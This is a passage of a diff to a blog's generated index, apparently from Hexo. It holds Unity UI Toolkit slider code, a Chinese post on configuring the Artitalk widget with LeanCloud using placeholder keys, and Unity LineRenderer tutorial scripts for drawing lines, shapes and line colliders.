    border-top-color: rgba(0, 0, 0, 0);
    border-bottom-color: rgba(0, 0, 0, 0);
    }

    #MySlider #unity-dragger {
    border-left-color: rgba(0, 0, 0, 0);
    border-right-color: rgba(0, 0, 0, 0);
    border-top-color: rgba(0, 0, 0, 0);
    border-bottom-color: rgba(0, 0, 0, 0);
    background-color: rgb(255, 254, 0);
    width: 20px;
    height: 100%;
    top: 0;
    flex-grow: 0;
    margin-left: 0;
    margin-right: 0;
    margin-top: 0;
    margin-bottom: 0;
    padding-left: 0;
    padding-right: 0;
    padding-top: 0;
    padding-bottom: 0;
    }

    .bar {
    width: 2000px;
    height: 100%;
    background-color: rgb(255, 94, 0);
    align-self: flex-end;
    }

    .newdragger {
    position: absolute;
    width: 80px;
    height: 80px;
    background-color: rgb(0, 140, 255);
    }

    .bubble {
    position: absolute;
    background-image: url('project://database/Assets/Images/Bubble.png?fileID=2800000&guid=b836b02351db7664d82b839e800143df&type=3#Bubble');
    width: 110px;
    height: 140px;
    opacity: 1;
    transition-property: scale, opacity;
    transition-duration: 1s, 1s;
    transition-timing-function: ease-out-elastic, ease-out-elastic;
    transform-origin: bottom;
    }

    .bubble_label {
    width: 100%;
    height: 75%;
    margin-left: 0;
    margin-right: 0;
    margin-top: 0;
    margin-bottom: 0;
    padding-left: 0;
    padding-right: 0;
    padding-top: 0;
    padding-bottom: 0;
    -unity-text-align: middle-center;
    font-size: 40px;
    -unity-font-style: bold;
    color: rgb(255, 255, 255);
    display: flex;
    }

    .bubble--hidden {
    opacity: 0;
    scale: 0.5 0.5;
    }
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    80
    81
    82
    83
    84
    85
    86
    87
    88
    89
    90
    91
    92
    93
    94
    95
    96
    97
    98
    99
    100
    101
    102
    103
    using System.Collections;
    using System.Collections.Generic;
    using UnityEngine;
    using UnityEngine.UIElements;

    public class CustomSlider : MonoBehaviour
    {
    private VisualElement m_Root;
    private VisualElement m_Slider;
    private VisualElement m_Dragger;
    private VisualElement m_Bar;
    private VisualElement m_NewDragger;
    private VisualElement m_Bubble;
    private Label m_BubbleLabel;

    public Color color_A;
    public Color color_B;
    // Start is called before the first frame update
    void Start()
    {
    m_Root = GetComponent<UIDocument>().rootVisualElement;
    m_Slider = m_Root.Q<Slider>("MySlider");
    m_Dragger = m_Root.Q<VisualElement>("unity-dragger");

    AddElements();

    m_Slider.RegisterCallback<ChangeEvent<float>>(SliderValueChanged);

    m_Slider.RegisterCallback<GeometryChangedEvent>(SliderInit);

    m_Slider.RegisterCallback<PointerCaptureEvent>(_=>
    {
    m_Bubble.RemoveFromClassList("bubble--hidden");
    });

    m_Slider.RegisterCallback<PointerCaptureOutEvent>(_ =>
    {
    m_Bubble.AddToClassList("bubble--hidden");
    });
    }

    void AddElements()
    {
    m_Bar = new VisualElement();
    m_Dragger.Add(m_Bar);
    m_Bar.name = "Bar";
    m_Bar.AddToClassList("bar");

    m_NewDragger = new VisualElement();
    m_Slider.Add(m_NewDragger);
    m_NewDragger.name = "NewDragger";
    m_NewDragger.AddToClassList("newdragger");
    m_NewDragger.pickingMode = PickingMode.Ignore;

    m_Bubble = new VisualElement();
    m_Slider.Add(m_Bubble);
    m_Bubble.name = "Bubble";
    m_Bubble.AddToClassList("bubble");
    m_Bubble.AddToClassList("bubble--hidden");
    m_Bubble.pickingMode = PickingMode.Ignore;

    m_BubbleLabel = new Label();
    m_Bubble.Add(m_BubbleLabel);
    m_BubbleLabel.name = "Bubble_Label";
    m_BubbleLabel.AddToClassList("bubble_label");
    m_BubbleLabel.pickingMode = PickingMode.Ignore;
    }

    void SliderValueChanged(ChangeEvent<float> value)
    {
    Vector2 offset = new Vector2((m_NewDragger.layout.width - m_Dragger.layout.width) / 2, (m_NewDragger.layout.height - m_Dragger.layout.height) / 2);
    Vector2 offset_Bubble = new Vector2((m_Bubble.layout.width - m_Dragger.layout.width) / 2, (m_Bubble.layout.height - m_Dragger.layout.height) / 2 + 120f);
    Vector2 pos = m_Dragger.parent.LocalToWorld(m_Dragger.transform.position);
    pos = m_NewDragger.parent.WorldToLocal(pos);

    m_NewDragger.transform.position = pos - offset;
    m_Bubble.transform.position = pos - offset_Bubble;

    float v = Mathf.Round(value.newValue);

    m_BubbleLabel.text = v.ToString();

    m_Bar.style.backgroundColor = Color.Lerp(color_A, color_B, v / 100f);
    m_Bubble.style.unityBackgroundImageTintColor = Color.Lerp(color_A, color_B, v / 100f);
    }

    void SliderInit(GeometryChangedEvent evt)
    {
    Vector2 offset = new Vector2((m_NewDragger.layout.width - m_Dragger.layout.width) / 2, (m_NewDragger.layout.height - m_Dragger.layout.height) / 2);
    Vector2 offset_Bubble = new Vector2((m_Bubble.layout.width - m_Dragger.layout.width) / 2, (m_Bubble.layout.height - m_Dragger.layout.height) / 2 + 120f);
    Vector2 pos = m_Dragger.parent.LocalToWorld(m_Dragger.transform.position);
    pos = m_NewDragger.parent.WorldToLocal(pos);

    m_NewDragger.transform.position = pos - offset;
    m_Bubble.transform.position = pos - offset_Bubble;
    }

    // Update is called once per frame
    void Update()
    {

    }
    }

    Unity UI Toolkit Beginner’s Guide 6: Timeline Animation

    ​让 UI Toolkit 支持 Timeline 的插件。

    ]]>
    @@ -2658,7 +2658,7 @@ /posts/Hexo-Artitalk/ - 配置

    ​基本按照 使用文档 | Artitalk.js 里的步骤来配置(我这里没有配置说说头像)。不过呢,源文档里建议使用国际版的 LeanCloud,这在国内会被墙,不可取!还得是改为国内版 LeanCloud

    ​将 Artitalk 的 JS 从 ArtitalkJS/Artitalk: 通过 leancloud 实现的可实时发布说说的 js (github.com) 加载到本地来使用,便于调整也防止被墙。

    ​使用方法:使用如下 HTML 语句(我调整了这里的 CSS,隐藏了一些被墙的内容,同时使用本地加载的方式引用 Artitalk.js):

    <style>
    #artitalk_main ul#maina>li {
    margin: 0;
    }
    .delete_right>svg {
    transform: translateX(-8px);
    }
    #shuoshuo-modal>center, #userinfo>center, #chanshu>center, #shanchur>center {
    margin: 10px 0;
    }
    #artitalk_main .cbp_tmtimeline>li .cbp_tmlabel {
    margin: 0 0 20px 90px;
    }
    #artitalk_main .cbp_tmtimeline>li:before, #uploadSource, #loadEmoji {
    display: none !important;
    }
    #artitalk_main .cbp_tmtimeline>li .cbp_tmlabel>div>p, span.cbp_tmlabel>p, .shuoshuo_time {
    color: white;
    }
    .cbp_tmlabel>div>p{
    margin-right: 25px;
    }
    .c2>center>p {
    margin : 10px 0;
    }
    #shuoshuo_edit {
    display: flex;
    }
    #artitalk_main .shuoshuo_text {
    margin: 0 auto;
    width: 95%;
    }
    </style>

    <center>居然被你找到了神秘的说说页!</center>

    ---

    <!-- 引用 artitalk -->
    <!--<script type="text/javascript" src="https://unpkg.com/artitalk"></script>-->

    <script type="text/javascript" src="Artitalk/dist/js/artitalk.js"></script>

    <!-- 存放说说的容器 -->
    <div id="artitalk_main"></div>
    <script>
    new Artitalk({
    appId: 'XXX', // Your LeanCloud appId
    appKey: 'XXX', // Your LeanCloud appKey
    serverURL: 'XXX',
    })
    </script>

    appIdappKeyserverURL 都可以分别从 LeanCloud 设置 - 应用凭证AppIDAppKeyREST API 服务器地址 里得到。

    ​接下来编辑 Artitalk.js 里的内容,由于 jsdelivr 在国内被墙,而里面的表情图片又是从这里获得的,只好把它们加载到本地并修改 url。同时把 Artitalk 的 logo 改成自己头像嘻嘻嘻~

    ​还有一些被墙了的不好用的功能,删之~

    ]]>
    + 配置

    ​基本按照 使用文档 | Artitalk.js 里的步骤来配置(我这里没有配置说说头像)。不过呢,源文档里建议使用国际版的 LeanCloud,这在国内会被墙,不可取!还得是改为国内版 LeanCloud

    ​将 Artitalk 的 JS 从 ArtitalkJS/Artitalk: 通过 leancloud 实现的可实时发布说说的 js (github.com) 加载到本地来使用,便于调整也防止被墙。

    ​使用方法:使用如下 HTML 语句(我调整了这里的 CSS,隐藏了一些被墙的内容,同时使用本地加载的方式引用 Artitalk.js):

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    <style>
    #artitalk_main ul#maina>li {
    margin: 0;
    }
    .delete_right>svg {
    transform: translateX(-8px);
    }
    #shuoshuo-modal>center, #userinfo>center, #chanshu>center, #shanchur>center {
    margin: 10px 0;
    }
    #artitalk_main .cbp_tmtimeline>li .cbp_tmlabel {
    margin: 0 0 20px 90px;
    }
    #artitalk_main .cbp_tmtimeline>li:before, #uploadSource, #loadEmoji {
    display: none !important;
    }
    #artitalk_main .cbp_tmtimeline>li .cbp_tmlabel>div>p, span.cbp_tmlabel>p, .shuoshuo_time {
    color: white;
    }
    .cbp_tmlabel>div>p{
    margin-right: 25px;
    }
    .c2>center>p {
    margin : 10px 0;
    }
    #shuoshuo_edit {
    display: flex;
    }
    #artitalk_main .shuoshuo_text {
    margin: 0 auto;
    width: 95%;
    }
    </style>

    <center>居然被你找到了神秘的说说页!</center>

    ---

    <!-- 引用 artitalk -->
    <!--<script type="text/javascript" src="https://unpkg.com/artitalk"></script>-->

    <script type="text/javascript" src="Artitalk/dist/js/artitalk.js"></script>

    <!-- 存放说说的容器 -->
    <div id="artitalk_main"></div>
    <script>
    new Artitalk({
    appId: 'XXX', // Your LeanCloud appId
    appKey: 'XXX', // Your LeanCloud appKey
    serverURL: 'XXX',
    })
    </script>

    appIdappKeyserverURL 都可以分别从 LeanCloud 设置 - 应用凭证AppIDAppKeyREST API 服务器地址 里得到。

    ​接下来编辑 Artitalk.js 里的内容,由于 jsdelivr 在国内被墙,而里面的表情图片又是从这里获得的,只好把它们加载到本地并修改 url。同时把 Artitalk 的 logo 改成自己头像嘻嘻嘻~

    ​还有一些被墙了的不好用的功能,删之~

    ]]>
    @@ -2683,7 +2683,7 @@ /posts/Unity-LineRenderer/ - 正文

    How To Draw a Line in Unity | Line Renderer Tutorial 1

    png

    ​往一个 GameObject 里加上 LineRenderer 组件,Positions 里设好坐标点的坐标,Materials 里设好线条的材质,即可在游戏场景里画线。

    ​写一个脚本,SetupLine() 功能是在 Transform 的坐标处连线:

    using System.Collections;
    using System.Collections.Generic;
    using UnityEngine;

    public class lr_LineController : MonoBehaviour
    {
    private LineRenderer lr;
    private Transform[] points;

    private void Awake()
    {
    lr = GetComponent<LineRenderer>();
    }

    public void SetupLine(Transform[] points)
    {
    lr.positionCount = points.Length;
    this.points = points;
    }

    private void Update()
    {
    for(int i = 0; i < points.Length; i++)
    {
    lr.SetPosition(i, points[i].position);
    }
    }
    }

    ​再写一个脚本调用 SetupLine()

    using System.Collections;
    using System.Collections.Generic;
    using UnityEngine;

    public class lr_Testing : MonoBehaviour
    {
    [SerializeField] private Transform[] points;
    [SerializeField] private lr_LineController line;

    private void Start()
    {
    line.SetupLine(points);
    }
    }

    ​给这个 lr_Testing 绑定若干 Transform,开跑!

    png

    How to Draw UI Lines in Unity in 10 Minutes | Line Renderer Tutorial 2

    png

    ​如何在 UI 层画线?将 Canvas 里的 Render Mode 设为 Screen Space - Camera

    png

    ​上一节的代码就可以对 Canvas 里的 Transform 生效。

    How to Draw Shapes in Unity | Line Renderer Unity Tutorial 3

    png

    ​构建场景如图所示。设计两个 Render ModeScreen Space - Camera 的画布:Pen Tool CanvasDots Canvas

    png

    ​绑定着 Pen Tool,控制画线的逻辑。

    png

    ​绑定着 Pen Canvas,表示画布。

    png

    ​绑定着 Dot Controller,表示点。

    png

    ​绑定着 Line Prefab,表示线条。

    png

    ​切换绘制模式(是否 loop)的开关。

    using UnityEngine;
    using UnityEngine.UI;
    using UnityEngine.EventSystems;
    using System.Collections;
    using System;

    public class PenCanvas : MonoBehaviour, IPointerClickHandler {
    public Action OnPenCanvasLeftClickEvent;
    public Action OnPenCanvasRightClickEvent;
    void IPointerClickHandler.OnPointerClick(PointerEventData eventData) {
    if (eventData.pointerId == -1) {
    OnPenCanvasLeftClickEvent?.Invoke();
    }
    else if (eventData.pointerId == -2) {
    OnPenCanvasRightClickEvent?.Invoke();
    }
    }
    }

    这段 Unity 代码定义了一个名为 PenCanvas 的脚本,实现了 IPointerClickHandler 接口,用于处理在画布上的点击事件。主要功能如下:

    1. 定义了两个事件处理函数 OnPenCanvasLeftClickEventOnPenCanvasRightClickEvent,分别表示在画布上左键点击和右键点击事件。
    2. 实现了 IPointerClickHandler 接口中的 OnPointerClick 方法,用于处理点击事件。当用户在画布上点击时,根据 eventData 中的 pointerId 判断点击的是左键(-1)还是右键(-2),然后触发相应的事件处理函数。

    这段代码的作用是在 Unity 中实现了对画布上左键和右键点击事件的监听,并在点击事件发生时触发相应的事件处理函数。

    using System.Collections;
    using System.Collections.Generic;
    using UnityEngine;

    public class LineController : MonoBehaviour
    {
    private LineRenderer lr;
    private List<DotController> dots;

    private void Awake() {
    lr = GetComponent<LineRenderer>();
    lr.positionCount = 0;

    dots = new List<DotController>();
    }

    public DotController GetFirstPoint() {
    return dots[0];
    }

    public void AddDot(DotController dot) {

    dot.SetLine(this);
    dot.SetIndex(dots.Count);

    lr.positionCount++;
    dots.Add(dot);
    }

    public void SplitPointsAtIndex(int index, out List<DotController> beforePoints, out List<DotController> afterPoints) {
    List<DotController> before = new List<DotController>();
    List<DotController> after = new List<DotController>();

    int i = 0;
    for (; i < index; i++) {
    before.Add(dots[i]);
    }
    i++;
    for (; i < dots.Count; i++) {
    after.Add(dots[i]);
    }

    beforePoints = before;
    afterPoints = after;

    dots.RemoveAt(index);
    }

    public void SetColor(Color color) {
    lr.startColor = color;
    lr.endColor = color;
    }

    public void ToggleLoop() {
    lr.loop = !lr.loop;
    }

    public bool isLooped() {
    return lr.loop;
    }

    private void LateUpdate() {
    if (dots.Count >= 2) {
    for (int i = 0; i < dots.Count; i++) {
    Vector3 position = dots[i].transform.position;
    position += new Vector3(0, 0, 5);

    lr.SetPosition(i, position);
    }
    }
    }
    }

    这段代码是一个名为 LineController 的 Unity 脚本,用于控制线条的行为。主要功能包括:

    1. Awake 方法中初始化 LineRenderer 和点列表,并设置初始位置数为 0
    2. 提供了 GetFirstPoint 方法来获取线条上的第一个点。
    3. 提供了 AddDot 方法,用于向线条中添加点。该方法会设置点的索引,并更新 LineRenderer 的位置数和点列表。
    4. 提供了 SplitPointsAtIndex 方法,用于在指定索引处分割线条上的点,并返回分割后的两部分点列表。
    5. 提供了 SetColor 方法,用于设置线条的颜色。
    6. 提供了 ToggleLoop 方法和 isLooped 方法,用于切换线条是否闭合的状态,并获取当前线条是否闭合的状态。
    7. LateUpdate 方法中,根据点的位置更新 LineRenderer 的位置,以确保线条能够实时跟随点的移动而更新。

    总体来说,这个脚本负责管理线条对象的行为,包括线条位置的更新、点的添加和删除、线条颜色的设置等功能。

    using UnityEngine;
    using UnityEngine.UI;
    using UnityEngine.EventSystems;
    using System.Collections;
    using System;
    public class DotController : MonoBehaviour, IDragHandler, IPointerClickHandler, IBeginDragHandler {

    [HideInInspector] public LineController line;
    [HideInInspector] public int index;

    public Action<DotController> OnDragEvent;
    public void OnDrag(PointerEventData eventData) {
    OnDragEvent?.Invoke(this);
    }

    public Action<DotController> OnRightClickEvent;
    public Action<LineController> OnLeftClickEvent;
    public void OnPointerClick(PointerEventData eventData) {
    if (eventData.pointerId == -2) {
    //Right Click
    OnRightClickEvent?.Invoke(this);
    }
    else if (eventData.pointerId == -1) {
    //Left Click
    OnLeftClickEvent?.Invoke(line);
    }
    }

    public void SetLine(LineController line) {
    this.line = line;
    }

    public void SetIndex(int index) {
    this.index = index;
    }

    public void OnBeginDrag(PointerEventData eventData) {
    if (eventData.pointerId == -1) {
    //Left Drag
    OnLeftClickEvent?.Invoke(line);
    }
    }
    }

    这段代码是一个名为 DotController 的 Unity 脚本,用于控制点的行为。主要功能包括:

    1. 实现了 IDragHandlerIPointerClickHandlerIBeginDragHandler 接口,以处理点的拖拽、鼠标点击和开始拖拽事件。
    2. 包含了一个公开的字段 line,用于存储点所属的线条对象。
    3. 包含了一个公开的字段 index,用于存储点在线条中的索引。
    4. 包含了 OnDragEventOnRightClickEventOnLeftClickEvent 三个事件,分别用于处理拖拽事件、右键点击事件和左键点击事件。
    5. 实现了 OnDrag 方法,用于在点被拖拽时触发相应的事件。
    6. 实现了 OnPointerClick 方法,根据鼠标点击的类型(左键或右键)来触发相应的事件。
    7. 实现了 SetLine 方法,用于设置点所属的线条对象。
    8. 实现了 SetIndex 方法,用于设置点在线条中的索引。
    9. 实现了 OnBeginDrag 方法,在开始拖拽事件中根据鼠标点击的类型来触发相应的事件。

    总体来说,这个脚本负责管理点对象的交互行为,包括拖拽、点击和开始拖拽事件的处理,以及与线条对象的关联和索引设置。

    using System;
    using System.Collections;
    using System.Collections.Generic;
    using UnityEngine;
    using UnityEngine.UI;

    public class PenTool : MonoBehaviour
    {
    [Header("Pen Canvas")]
    [SerializeField] private PenCanvas penCanvas;

    [Header("Dots")]
    [SerializeField] private GameObject dotPrefab;
    [SerializeField] private Transform dotParent;

    [Header("Lines")]
    [SerializeField] private GameObject linePrefab;
    [SerializeField] private Transform lineParent;
    private LineController currentLine;

    [Header("Colors")]
    [SerializeField] private Color activeColor;
    [SerializeField] private Color normalColor;

    [Header("Loop Toggle")]
    [SerializeField] Image loopToggle;
    [SerializeField] Sprite loopSprite;
    [SerializeField] Sprite unloopSprite;

    private void Start() {
    penCanvas.OnPenCanvasLeftClickEvent += AddDot;
    penCanvas.OnPenCanvasRightClickEvent += EndCurrentLine;
    }

    public void ToggleLoop() {
    if (currentLine != null) {
    currentLine.ToggleLoop();
    loopToggle.sprite = (currentLine.isLooped()) ? unloopSprite : loopSprite;
    }
    }

    private void AddDot() {
    if (currentLine == null) {
    LineController lineController = Instantiate(linePrefab, Vector3.zero, Quaternion.identity, lineParent).GetComponent<LineController>();
    SetCurrentLine(lineController);
    }

    DotController dot = Instantiate(dotPrefab, GetMousePosition(), Quaternion.identity, dotParent).GetComponent<DotController>();
    dot.OnDragEvent += MoveDot;
    dot.OnRightClickEvent += RemoveDot;
    dot.OnLeftClickEvent += SetCurrentLine;

    currentLine.AddDot(dot);
    }

    private void RemoveDot(DotController dot) {
    dot.line.SplitPointsAtIndex(dot.index, out List<DotController> before, out List<DotController> after);

    Destroy(dot.line.gameObject);
    Destroy(dot.gameObject);

    LineController beforeLine = Instantiate(linePrefab, Vector3.zero, Quaternion.identity, lineParent).GetComponent<LineController>();
    for (int i = 0; i < before.Count; i++) {
    beforeLine.AddDot(before[i]);
    }

    LineController afterLine = Instantiate(linePrefab, Vector3.zero, Quaternion.identity, lineParent).GetComponent<LineController>();
    for (int i = 0; i < after.Count; i++) {
    afterLine.AddDot(after[i]);
    }
    }

    private void EndCurrentLine() {
    if (currentLine != null) {
    currentLine.SetColor(normalColor);
    loopToggle.enabled = false;
    currentLine = null;
    }
    }

    private void SetCurrentLine(LineController newLine) {
    EndCurrentLine();

    currentLine = newLine;
    currentLine.SetColor(activeColor);

    loopToggle.enabled = true;
    loopToggle.sprite = (currentLine.isLooped()) ? unloopSprite : loopSprite;
    }

    private void MoveDot(DotController dot) {
    dot.transform.position = GetMousePosition();
    }

    private Vector3 GetMousePosition() {
    Vector3 worldMousePosition = Camera.main.ScreenToWorldPoint(Input.mousePosition);
    worldMousePosition.z = 0;

    return worldMousePosition;
    }
    }

    这段代码是一个 Unity 脚本,名为 PenTool,用于实现一个绘图工具的功能。主要包括以下内容:

    1. Start 方法中订阅了 PenCanvas 的左键点击事件和右键点击事件,分别触发 AddDotEndCurrentLine 方法。
    2. ToggleLoop 方法用于切换当前线条是否闭合,并更新对应的 UI 图标。
    3. AddDot 方法用于在画布上添加一个点,并将点添加到当前线条中。
    4. RemoveDot 方法用于移除指定的点,并重新生成两个新的线条来连接剩余的点。
    5. EndCurrentLine 方法用于结束当前线条的绘制,并重置相关状态。
    6. SetCurrentLine 方法用于设置当前操作的线条,并更新相关状态。
    7. MoveDot 方法用于移动点的位置到鼠标位置。
    8. GetMousePosition 方法用于获取鼠标在世界坐标系中的位置。

    整体来说,这个脚本实现了绘图工具的核心功能,包括点和线条的创建、操作以及相关 UI 的更新。

    How to Detect COLLISIONS on a Line Renderer in Unity

    ​给 Line Prefab 绑上两个脚本:

    png

    using System.Collections;
    using System.Collections.Generic;
    using System.Linq;
    using UnityEngine;

    [RequireComponent(typeof(LineController), typeof(PolygonCollider2D))]
    public class LineCollision : MonoBehaviour {

    LineController lineController;
    PolygonCollider2D polygonCollider;

    private void Awake() {
    lineController = GetComponent<LineController>();
    polygonCollider = GetComponent<PolygonCollider2D>();
    }

    private void LateUpdate() {

    //Get all the positions from the line renderer
    Vector3[] positions = lineController.GetPositions();

    //If we have enough points to draw a line
    if (positions.Count() >= 2) {

    //Get the number of line between two points
    int numberOfLines = positions.Length - 1;

    //Make as many paths for each different line as we have lines
    polygonCollider.pathCount = numberOfLines;

    //Get Collider points between two consecutive points
    for (int i = 0; i < numberOfLines; i++) {
    //Get the two next points
    List<Vector2> currentPositions = new List<Vector2> {
    positions[i],
    positions[i+1]
    };

    List<Vector2> currentColliderPoints = CalculateColliderPoints(currentPositions);
    polygonCollider.SetPath(i, currentColliderPoints.ConvertAll(p => (Vector2)transform.InverseTransformPoint(p)));
    }
    }
    else {

    polygonCollider.pathCount = 0;
    }
    }

    private List<Vector2> CalculateColliderPoints(List<Vector2> positions) {
    //Get The Width of the Line
    float width = lineController.GetWidth();

    // m = (y2 - y1) / (x2 - x1)
    float m = (positions[1].y - positions[0].y) / (positions[1].x - positions[0].x);
    float deltaX = (width / 2f) * (m / Mathf.Pow(m * m + 1, 0.5f));
    float deltaY = (width / 2f) * (1 / Mathf.Pow(1 + m * m, 0.5f));

    //Calculate Vertex Offset from Line Point
    Vector2[] offsets = new Vector2[2];
    offsets[0] = new Vector2(-deltaX, deltaY);
    offsets[1] = new Vector2(deltaX, -deltaY);

    List<Vector2> colliderPoints = new List<Vector2> {
    positions[0] + offsets[0],
    positions[1] + offsets[0],
    positions[1] + offsets[1],
    positions[0] + offsets[1]
    };

    return colliderPoints;
    }
    }
    using System.Collections;
    using System.Collections.Generic;
    using UnityEngine;

    public class LineController : MonoBehaviour
    {
    private LineRenderer lr;
    private List<DotController> dots;

    private void Awake() {
    lr = GetComponent<LineRenderer>();
    lr.positionCount = 0;

    dots = new List<DotController>();
    }

    public DotController GetFirstPoint() {
    return dots[0];
    }

    public void AddDot(DotController dot) {

    dot.SetLine(this);
    dot.SetIndex(dots.Count);

    lr.positionCount++;
    dots.Add(dot);
    }

    public void SplitPointsAtIndex(int index, out List<DotController> beforePoints, out List<DotController> afterPoints) {
    List<DotController> before = new List<DotController>();
    List<DotController> after = new List<DotController>();

    int i = 0;
    for (; i < index; i++) {
    before.Add(dots[i]);
    }
    i++;
    for (; i < dots.Count; i++) {
    after.Add(dots[i]);
    }

    beforePoints = before;
    afterPoints = after;

    dots.RemoveAt(index);
    }

    public void SetColor(Color color) {
    lr.startColor = color;
    lr.endColor = color;
    }

    public void ToggleLoop() {
    lr.loop = !lr.loop;
    }

    public bool isLooped() {
    return lr.loop;
    }

    private void LateUpdate() {
    if (dots.Count >= 2) {
    for (int i = 0; i < dots.Count; i++) {
    Vector3 position = dots[i].transform.position;
    position += new Vector3(0, 0, 5);

    lr.SetPosition(i, position);
    }
    }
    }

    public Vector3[] GetPositions() {
    Vector3[] positions = new Vector3[lr.positionCount];
    lr.GetPositions(positions);
    return positions;
    }

    public float GetWidth() {
    return lr.startWidth;
    }
    }

    ​如此,生成线条时就会附带对应的碰撞体。

    ]]>
    + 正文

    How To Draw a Line in Unity | Line Renderer Tutorial 1

    png

    ​往一个 GameObject 里加上 LineRenderer 组件,Positions 里设好坐标点的坐标,Materials 里设好线条的材质,即可在游戏场景里画线。

    ​写一个脚本,SetupLine() 功能是在 Transform 的坐标处连线:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    using System.Collections;
    using System.Collections.Generic;
    using UnityEngine;

    public class lr_LineController : MonoBehaviour
    {
    private LineRenderer lr;
    private Transform[] points;

    private void Awake()
    {
    lr = GetComponent<LineRenderer>();
    }

    public void SetupLine(Transform[] points)
    {
    lr.positionCount = points.Length;
    this.points = points;
    }

    private void Update()
    {
    for(int i = 0; i < points.Length; i++)
    {
    lr.SetPosition(i, points[i].position);
    }
    }
    }

    ​再写一个脚本调用 SetupLine()

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    using System.Collections;
    using System.Collections.Generic;
    using UnityEngine;

    public class lr_Testing : MonoBehaviour
    {
    [SerializeField] private Transform[] points;
    [SerializeField] private lr_LineController line;

    private void Start()
    {
    line.SetupLine(points);
    }
    }

    ​给这个 lr_Testing 绑定若干 Transform,开跑!

    png

    How to Draw UI Lines in Unity in 10 Minutes | Line Renderer Tutorial 2

    png

    ​如何在 UI 层画线?将 Canvas 里的 Render Mode 设为 Screen Space - Camera

    png

    ​上一节的代码就可以对 Canvas 里的 Transform 生效。

    How to Draw Shapes in Unity | Line Renderer Unity Tutorial 3

    png

    ​构建场景如图所示。设计两个 Render ModeScreen Space - Camera 的画布:Pen Tool CanvasDots Canvas

    png

    ​绑定着 Pen Tool,控制画线的逻辑。

    png

    ​绑定着 Pen Canvas,表示画布。

    png

    ​绑定着 Dot Controller,表示点。

    png

    ​绑定着 Line Prefab,表示线条。

    png

    ​切换绘制模式(是否 loop)的开关。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    using UnityEngine;
    using UnityEngine.UI;
    using UnityEngine.EventSystems;
    using System.Collections;
    using System;

    public class PenCanvas : MonoBehaviour, IPointerClickHandler {
    public Action OnPenCanvasLeftClickEvent;
    public Action OnPenCanvasRightClickEvent;
    void IPointerClickHandler.OnPointerClick(PointerEventData eventData) {
    if (eventData.pointerId == -1) {
    OnPenCanvasLeftClickEvent?.Invoke();
    }
    else if (eventData.pointerId == -2) {
    OnPenCanvasRightClickEvent?.Invoke();
    }
    }
    }

    这段 Unity 代码定义了一个名为 PenCanvas 的脚本,实现了 IPointerClickHandler 接口,用于处理在画布上的点击事件。主要功能如下:

    1. 定义了两个事件处理函数 OnPenCanvasLeftClickEventOnPenCanvasRightClickEvent,分别表示在画布上左键点击和右键点击事件。
    2. 实现了 IPointerClickHandler 接口中的 OnPointerClick 方法,用于处理点击事件。当用户在画布上点击时,根据 eventData 中的 pointerId 判断点击的是左键(-1)还是右键(-2),然后触发相应的事件处理函数。

    这段代码的作用是在 Unity 中实现了对画布上左键和右键点击事件的监听,并在点击事件发生时触发相应的事件处理函数。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    using System.Collections;
    using System.Collections.Generic;
    using UnityEngine;

    public class LineController : MonoBehaviour
    {
    private LineRenderer lr;
    private List<DotController> dots;

    private void Awake() {
    lr = GetComponent<LineRenderer>();
    lr.positionCount = 0;

    dots = new List<DotController>();
    }

    public DotController GetFirstPoint() {
    return dots[0];
    }

    public void AddDot(DotController dot) {

    dot.SetLine(this);
    dot.SetIndex(dots.Count);

    lr.positionCount++;
    dots.Add(dot);
    }

    public void SplitPointsAtIndex(int index, out List<DotController> beforePoints, out List<DotController> afterPoints) {
    List<DotController> before = new List<DotController>();
    List<DotController> after = new List<DotController>();

    int i = 0;
    for (; i < index; i++) {
    before.Add(dots[i]);
    }
    i++;
    for (; i < dots.Count; i++) {
    after.Add(dots[i]);
    }

    beforePoints = before;
    afterPoints = after;

    dots.RemoveAt(index);
    }

    public void SetColor(Color color) {
    lr.startColor = color;
    lr.endColor = color;
    }

    public void ToggleLoop() {
    lr.loop = !lr.loop;
    }

    public bool isLooped() {
    return lr.loop;
    }

    private void LateUpdate() {
    if (dots.Count >= 2) {
    for (int i = 0; i < dots.Count; i++) {
    Vector3 position = dots[i].transform.position;
    position += new Vector3(0, 0, 5);

    lr.SetPosition(i, position);
    }
    }
    }
    }

    这段代码是一个名为 LineController 的 Unity 脚本,用于控制线条的行为。主要功能包括:

    1. Awake 方法中初始化 LineRenderer 和点列表,并设置初始位置数为 0
    2. 提供了 GetFirstPoint 方法来获取线条上的第一个点。
    3. 提供了 AddDot 方法,用于向线条中添加点。该方法会设置点的索引,并更新 LineRenderer 的位置数和点列表。
    4. 提供了 SplitPointsAtIndex 方法,用于在指定索引处分割线条上的点,并返回分割后的两部分点列表。
    5. 提供了 SetColor 方法,用于设置线条的颜色。
    6. 提供了 ToggleLoop 方法和 isLooped 方法,用于切换线条是否闭合的状态,并获取当前线条是否闭合的状态。
    7. LateUpdate 方法中,根据点的位置更新 LineRenderer 的位置,以确保线条能够实时跟随点的移动而更新。

    总体来说,这个脚本负责管理线条对象的行为,包括线条位置的更新、点的添加和删除、线条颜色的设置等功能。

